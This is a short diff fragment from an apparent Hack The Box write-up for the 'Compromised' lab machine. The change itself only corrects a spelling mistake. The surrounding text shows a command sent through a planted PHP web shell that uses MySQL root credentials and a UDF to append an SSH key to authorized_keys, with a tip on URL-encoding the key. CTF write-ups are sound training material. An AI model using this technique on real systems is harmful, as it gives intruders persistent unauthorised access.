x00tex/hackTheBox/Boxes/linux/Retired/compromised/README.md

       http://10.10.10.207/shop/vqmod/xml/F8ALL.php?c=mysql -u root -pchangethis -e "select exec_cmd('echo ssh-rsa AAAAB3NzaC1y...Nb5q4%2B1LtnZpjM= > ~/.ssh/authorized_keys')"

-  * while putting my ssh in the `authorized_keys` it won't worked at first and then i notice in the output that the every plus `+` sign from the ssh key was converted into a white space so i changed every `+` sign into `%2B` that is equvilent to a plus sign to solve this problem.
+  * while putting my ssh in the `authorized_keys` it won't worked at first and then i notice in the output that the every plus `+` sign from the ssh key was converted into a white space so i changed every `+` sign into `%2B` that is equivalent to a plus sign to solve this problem.

 ### USER:mysql shell